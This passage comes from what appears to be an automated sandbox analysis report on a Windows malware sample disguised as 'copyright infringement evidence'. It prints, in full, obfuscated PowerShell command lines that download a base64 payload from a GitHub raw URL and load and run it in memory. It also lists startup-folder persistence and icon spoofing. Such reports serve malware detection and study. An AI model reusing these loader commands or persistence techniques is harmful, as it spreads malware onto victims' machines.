-executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17A2F54 pushfq ; iretd 0_2_00007FF7A17A2F59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FF83B8E00BD pushad ; iretd 29_2_00007FF83B8E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FF83B8C00BD pushad ; iretd 30_2_00007FF83B8C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FF83B8F00BD pushad ; iretd 31_2_00007FF83B8F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FF83B8F19D8 pushad ; ret 31_2_00007FF83B8F19E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FF83B8E00BD pushad ; iretd 33_2_00007FF83B8E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FF83B8B00BD pushad ; iretd 35_2_00007FF83B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FF83B8B7AD0 pushad ; ret 35_2_00007FF83B8B7AD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF83B8B00BD pushad ; iretd 36_2_00007FF83B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 43_2_00007FF83B8C00BD pushad ; iretd 43_2_00007FF83B8C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 43_2_00007FF83B8C4AF2 push eax; retf 43_2_00007FF83B8C4B09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E00BD pushad ; iretd 45_2_00007FF83B8E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E2AE2 pushad ; iretd 45_2_00007FF83B8E2AE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E2A25 pushad ; iretd 45_2_00007FF83B8E2AE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E2375 pushad ; retf 45_2_00007FF83B8E2399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B9B4779 push 90000047h; iretd 45_2_00007FF83B9B47B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 53_2_00007FF83B8B00BD pushad ; iretd 53_2_00007FF83B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 53_2_00007FF83B9836ED pushad ; retf 53_2_00007FF83B983772

Boot Survival
barindex
Drops script or batch files to the startup folder
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat Jump to dropped file
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (98).png
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
